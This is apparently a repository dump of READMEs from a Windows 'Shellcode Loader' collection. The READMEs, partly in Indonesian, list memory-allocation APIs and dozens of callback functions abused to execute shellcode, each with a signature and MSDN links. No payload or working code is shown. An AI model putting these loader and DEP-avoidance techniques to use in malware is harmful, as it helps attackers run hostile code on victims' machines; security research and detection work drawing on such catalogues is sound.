NtAllocateVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtAllocateVirtualMemory.html) 20 | - [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html) 21 | - [NTInternals NtFreeVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtFreeVirtualMemory.html) 22 | -------------------------------------------------------------------------------- /windows/allocation/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Proses `allocation` digunakan untuk menciptakan ruang yang cukup untuk menampung shellcode yang telah diekstrak dari ruang penyimpanan (global/stack/resource/download). Memory yang telah dialokasikan haruslah ditandai sebagai executable. Hal ini dilakukan untuk menghindari adanya exception oleh DEP (Data Execution Prevention). -------------------------------------------------------------------------------- /windows/allocation/RtlAllocateHeap/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `RtlAllocateHeap`. Namun, alokasi dilakukan pada segment heap terpisah dan tidak menggunakan Heap default. 8 | 9 | ```c++ 10 | PVOID RtlAllocateHeap (PVOID HeapHandle, ULONG Flags, SIZE_T Size); 11 | 12 | PVOID RtlCreateHeap (ULONG Flags, PVOID HeapBase, SIZE_T ReserveSize, SIZE_T CommitSize, PVOID Lock, PRTL_HEAP_PARAMETERS Parameters); 13 | 14 | LOGICAL RtlFreeHeap (PVOID HeapHandle, ULONG Flags, PVOID BaseAddress); 15 | 16 | PVOID RtlDestroyHeap (PVOID HeapHandle); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN RtlAllocateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlallocateheap) 22 | - [MSDN RtlCreateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcreateheap) 23 | - [MSDN RtlFreeHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlfreeheap) 24 | - [MSDN RtlDestroyheap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtldestroyheap) -------------------------------------------------------------------------------- /windows/allocation/VirtualAlloc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi dengan `VirtualAlloc` dan dealokasi dengan `VirtualFree`. 8 | 9 | ```c++ 10 | LPVOID VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 11 | 12 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 13 | 14 | BOOL VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN VirtualAlloc](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) 20 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) 21 | - [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree) 22 | -------------------------------------------------------------------------------- /windows/allocation/VirtualAlloc2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi dengan `VirtualAlloc2` dan dealokasi dengan `VirtualFree`. 8 | 9 | ```c++ 10 | LPVOID VirtualAlloc2(HANDLE Process, PVOID BaseAddress, SIZE_T Size, ULONG AllocationType, ULONG PageProtection, MEM_EXTENDED_PARAMETER ExtendedParameters, ULONG ParameterCount); 11 | 12 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 13 | 14 | BOOL VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN VirtualAlloc2](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc2) 20 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) 21 | - [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree) 22 | -------------------------------------------------------------------------------- /windows/allocation/VirtualAllocEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi dengan `VirtualAllocEx` dan dealokasi dengan `VirtualFreeEx`. 8 | 9 | ```c++ 10 | LPVOID VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 11 | 12 | BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 13 | 14 | BOOL VirtualFreeEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN VirtualAllocEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex) 20 | - [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex) 21 | - [MSDN VirtualFreeEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfreeex) 22 | -------------------------------------------------------------------------------- /windows/execution/asm-jmp/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode dengan menuju langsung (jump) ke alamat shellcode. -------------------------------------------------------------------------------- /windows/execution/asm-jmp/rust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/execution/callback/CallWindowProc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CallWindowProc`. 8 | 9 | ```c++ 10 | LRESULT CallWindowProcA (WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam); 11 | 12 | LRESULT CallWindowProcW (WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CallWindowProcA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowproca) 18 | - [MSDN CallWindowProcW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowprocw) -------------------------------------------------------------------------------- /windows/execution/callback/CertEnumPhysicalStore/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CertEnumPhysicalStore`. 8 | 9 | ```c++ 10 | BOOL CertEnumPhysicalStore (const void *pvSystemStore, DWORD dwFlags, void *pvArg, PFN_CERT_ENUM_PHYSICAL_STORE pfnEnum); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CertEnumPhysicalStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumphysicalstore) -------------------------------------------------------------------------------- /windows/execution/callback/CertEnumSystemStore/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CertEnumSystemStore`. 8 | 9 | ```c++ 10 | BOOL CertEnumSystemStore (DWORD dwFlags, void pvSystemStoreLocationPara, void pvArg, PFN_CERT_ENUM_SYSTEM_STORE pfnEnum); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CertEnumSystemStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstore) -------------------------------------------------------------------------------- /windows/execution/callback/CertEnumSystemStoreLocation/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CertEnumSystemStoreLocation`. 8 | 9 | ```c++ 10 | BOOL CertEnumSystemStoreLocation (DWORD dwFlags, void * pvArg, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION pfnEnum); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CertEnumSystemStoreLocation](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstorelocation) -------------------------------------------------------------------------------- /windows/execution/callback/CertFindChainInStore/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CertFindChainInStore`. 8 | 9 | ```c++ 10 | PCCERT_CHAIN_CONTEXT CertFindChainInStore (HCERTSTORE hCertStore, DWORD dwCertEncodingType, DWORD dwFindFlags, DWORD dwFindType, const void *pvFindPara, PCCERT_CHAIN_CONTEXT pPrevChainContext); 11 | 12 | HCERTSTORE CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara); 13 | 14 | HCERTSTORE CertOpenSystemStoreA (HCRYPTPROV_LEGACY hProv, LPCSTR szSubsystemProtocol); 15 | 16 | HCERTSTORE CertOpenSystemStoreW (HCRYPTPROV_LEGACY hProv, LPCWSTR szSubsystemProtocol); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN CertFindChainInStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certfindchaininstore) 22 | - [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore) 23 | - [MSDN CertOpenSystemStoreA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorea) 24 | - [MSDN CertOpenSystemStoreW](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorew) -------------------------------------------------------------------------------- /windows/execution/callback/ChooseColor/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ChooseColor`. 8 | 9 | ```c++ 10 | BOOL ChooseColor (LPCHOOSECOLOR lpcc); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN ChooseColor](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646912(v=vs.85)) 16 | - [MSDN structure CHOOSECOLORA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolora-r1) 17 | - [MSDN structure CHOOSECOLORW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolorw-r1) -------------------------------------------------------------------------------- /windows/execution/callback/ChooseFont/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ChooseFont`. 8 | 9 | ```c++ 10 | BOOL ChooseFont (LPCHOOSEFONT lpcf); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN ChooseFont](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646914(v=vs.85)) 16 | - [MSDN structure CHOOSEFONTA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefonta) 17 | - [MSDN structure CHOOSEFONTW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefontW) -------------------------------------------------------------------------------- /windows/execution/callback/CopyFile2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CopyFile2`. 8 | 9 | ```c++ 10 | HRESULT CopyFile2 (PCWSTR pwszExistingFileName, PCWSTR pwszNewFileName, COPYFILE2_EXTENDED_PARAMETERS pExtendedParameters); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CopyFile2](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfile2) -------------------------------------------------------------------------------- /windows/execution/callback/CopyFileEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CopyFileEx`. 8 | 9 | ```c++ 10 | BOOL CopyFileExA (LPCSTR lpExistingFileName, LPCSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags); 11 | 12 | BOOL CopyFileExW (LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CopyFileExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexa) 18 | - [MSDN CopyFileExW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexw) -------------------------------------------------------------------------------- /windows/execution/callback/CreatePropertySheetPage/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreatePropertySheetPage`. 8 | 9 | ```c++ 10 | HPROPSHEETPAGE CreatePropertySheetPageA (LPCPROPSHEETPAGEA constPropSheetPagePointer); 11 | 12 | HPROPSHEETPAGE CreatePropertySheetPageW (LPCPROPSHEETPAGEW constPropSheetPagePointer); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CreatePropertySheetPageA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagea) 18 | - [MSDN CreatePropertySheetPageW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagew) 19 | - [MSDN structure PROPSHEETPAGE](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetpage) -------------------------------------------------------------------------------- /windows/execution/callback/CryptDecodeMessage/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptDecodeMessage`. 8 | 9 | ```c++ 10 | BOOL CryptDecodeMessage (DWORD dwMsgTypeFlags, PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara, PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbEncodedBlob, DWORD cbEncodedBlob, DWORD dwPrevInnerContentType, DWORD *pdwMsgType, DWORD *pdwInnerContentType, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppXchgCert, PCCERT_CONTEXT *ppSignerCert); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CryptDecodeMessage](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecodemessage) 16 | - [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para) -------------------------------------------------------------------------------- /windows/execution/callback/CryptEnumKeyIdentifierProperties/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptEnumKeyIdentifierProperties`. 8 | 9 | ```c++ 10 | BOOL CryptEnumKeyIdentifierProperties (const CRYPT_HASH_BLOB *pKeyIdentifier, DWORD dwPropId, DWORD dwFlags, LPCWSTR pwszComputerName, void *pvReserved, void *pvArg, PFN_CRYPT_ENUM_KEYID_PROP pfnEnum); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CryptEnumKeyIdentifierProperties](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumkeyidentifierproperties) -------------------------------------------------------------------------------- /windows/execution/callback/CryptEnumOIDFunction/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptEnumOIDFunction`. 8 | 9 | ```c++ 10 | BOOL CryptEnumOIDFunction (DWORD dwEncodingType, LPCSTR pszFuncName, LPCSTR pszOID, DWORD dwFlags, void *pvArg, PFN_CRYPT_ENUM_OID_FUNC pfnEnumOIDFunc); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CryptEnumOIDFunction](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidfunction) -------------------------------------------------------------------------------- /windows/execution/callback/CryptEnumOIDInfo/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptEnumOIDInfo`. 8 | 9 | ```c++ 10 | BOOL CryptEnumOIDInfo (DWORD dwGroupId, DWORD dwFlags, void pvArg, PFN_CRYPT_ENUM_OID_INFO pfnEnumOIDInfo); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CryptEnumOIDInfo](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidinfo) -------------------------------------------------------------------------------- /windows/execution/callback/CryptInstallOIDFunctionAddress/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptInstallOIDFunctionAddress`. 8 | 9 | Install fungsi sebagai callback saat membuka store baru. 10 | 11 | ```c++ 12 | BOOL CryptInstallOIDFunctionAddress(HMODULE hModule, DWORD dwEncodingType, LPCSTR pszFuncName, DWORD cFuncEntry, const CRYPT_OID_FUNC_ENTRY [] rgFuncEntry, DWORD dwFlags); 13 | 14 | BOOL CryptFreeOIDFunctionAddress (HCRYPTOIDFUNCADDR hFuncAddr, DWORD dwFlags); 15 | 16 | HCERTSTORE CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara); 17 | 18 | BOOL CertCloseStore (HCERTSTORE hCertStore, DWORD dwFlags); 19 | ``` 20 | 21 | ### Reference 22 | 23 | - [MSDN CryptInstallOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptinstalloidfunctionaddress) 24 | - [MSDN CryptFreeOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptfreeoidfunctionaddress) 25 | - [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore) 26 | - [MSDN CertCloseStore](https://docs.microsoft.com/en-us/windows/win32/api/Wincrypt/nf-wincrypt-certclosestore) 27 | -------------------------------------------------------------------------------- /windows/execution/callback/CryptVerifyMessageSignature/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptVerifyMessageSignature`. 8 | 9 | ```c++ 10 | BOOL CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CryptVerifyMessageSignature](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptverifymessagesignature) 16 | - [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para) -------------------------------------------------------------------------------- /windows/execution/callback/DPA_DestroyCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DPA_EnumCallback`. 8 | 9 | ```c++ 10 | void DPA_DestroyCallback (HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData); 11 | 12 | HDPA DPA_Create (int cItemGrow); 13 | 14 | int DPA_InsertPtr (HDPA hdpa, int i, void *p); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN DPA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroycallback) 20 | - [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create) 21 | - [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr) -------------------------------------------------------------------------------- /windows/execution/callback/DPA_EnumCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DPA_EnumCallback`. 8 | 9 | ```c++ 10 | void DPA_EnumCallback (HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData); 11 | 12 | HDPA DPA_Create (int cItemGrow); 13 | 14 | BOOL DPA_Destroy (HDPA hdpa); 15 | 16 | int DPA_InsertPtr (HDPA hdpa, int i, void *p); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN DPA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_enumcallback) 22 | - [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create) 23 | - [MSDN DPA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroy) 24 | - [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr) -------------------------------------------------------------------------------- /windows/execution/callback/DSA_DestroyCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DSA_DestroyCallback`. 8 | 9 | ```c++ 10 | void DSA_DestroyCallback (HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData); 11 | 12 | HDSA DSA_Create (int cbItem, int cItemGrow); 13 | 14 | int DSA_InsertItem (HDSA hdsa, int i, const void *pitem); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN DSA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroycallback) 20 | - [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create) 21 | - [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem) -------------------------------------------------------------------------------- /windows/execution/callback/DSA_EnumCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DSA_EnumCallback`. 8 | 9 | ```c++ 10 | void DSA_EnumCallback (HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData); 11 | 12 | HDSA DSA_Create (int cbItem, int cItemGrow); 13 | 14 | BOOL DSA_Destroy (HDSA hdsa); 15 | 16 | int DSA_InsertItem (HDSA hdsa, int i, const void *pitem); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN DSA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_enumcallback) 22 | - [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create) 23 | - [MSDN DSA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroy) 24 | - [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem) -------------------------------------------------------------------------------- /windows/execution/callback/DialogBoxIndirectParam/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DialogBoxIndirectParam`. 8 | 9 | ```c++ 10 | INT_PTR DialogBoxIndirectParamA (HINSTANCE hInstance, LPCDLGTEMPLATEA hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam); 11 | 12 | INT_PTR DialogBoxIndirectParamW (HINSTANCE hInstance, LPCDLGTEMPLATEW hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN DialogBoxIndirectParamA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparama) 18 | - [MSDN DialogBoxIndirectParamW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparamw) -------------------------------------------------------------------------------- /windows/execution/callback/DirectSoundCaptureEnumerate/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DirectSoundCaptureEnumerate`. 8 | 9 | ```c++ 10 | HRESULT DirectSoundCaptureEnumerate (LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN DirectSoundCaptureEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416761(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/DirectSoundEnumerate/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DirectSoundEnumerate`. 8 | 9 | ```c++ 10 | HRESULT DirectSoundEnumerate (LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN DirectSoundEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416763(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/DrawState/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `DrawState`. 8 | 9 | ```c++ 10 | BOOL DrawStateA (HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags); 11 | 12 | BOOL DrawStateW (HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN DrawStateA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatea) 18 | - [MSDN DrawStateW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatew) -------------------------------------------------------------------------------- /windows/execution/callback/EnumCalendarInfo/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumCalendarInfo`. 8 | 9 | ```c++ 10 | BOOL EnumCalendarInfoA (CALINFO_ENUMPROCA lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType); 11 | 12 | BOOL EnumCalendarInfoW (CALINFO_ENUMPROCW lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumCalendarInfoA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoa) 18 | - [MSDN EnumCalendarInfoW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfow) -------------------------------------------------------------------------------- /windows/execution/callback/EnumCalendarInfoEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumCalendarInfoEx`. 8 | 9 | ```c++ 10 | BOOL 